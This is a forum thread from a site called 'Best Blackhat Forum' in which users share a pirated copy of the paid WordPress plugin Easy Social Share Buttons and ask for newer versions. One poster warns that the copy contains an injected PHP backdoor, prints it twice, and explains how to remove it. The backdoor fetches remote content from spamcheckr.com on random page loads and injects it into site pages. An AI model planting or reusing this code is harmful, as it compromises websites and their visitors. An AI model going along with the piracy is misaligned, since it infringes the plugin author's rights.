Best Blackhat Forum

Full Version: [GET]Easy Social Share Buttons for WordPress
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2
Thanks for the share mate.

Repped ya.
v1.3.9.2 pls!
WP_HEAD Injection - spamcheckr
/lib/essb-class.php

PHP Code:
<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function sec14545chesk() {if(function_exists('curl_init')){$addressd "http://spamcheckr.com/l.php";$ch curl_init();$timeout 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','sec14545chesk');}} ?>

to remove - either remove the code from the .php or

remove line 2593 from lib/essb.php
PHP Code:
require( dirname__FILE__ ) . '/essb-class.php'); 
WP_HEAD Injection - spamcheckr
/lib/essb-class.php

Code:
<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function sec14545chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,​1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','sec14545chesk');}} ?>

to remove - either remove the code from the .php or

remove line 2593 from lib/essb.php
Code:
require( dirname( __FILE__ ) . '/essb-class.php');
Do you have the latest version? Thanks
(10-11-2017 04:32 PM)philoakey Wrote: [ -> ]Requested Here

rep added, thanks!
Are there any recent version... this is 2 versions behind.
(10-13-2017 06:53 AM)aminrod Wrote: [ -> ]Are there any recent version... this is 2 versions behind.

No, This is the most recent update I received from the 8th October.
Pages: 1 2
Reference URL's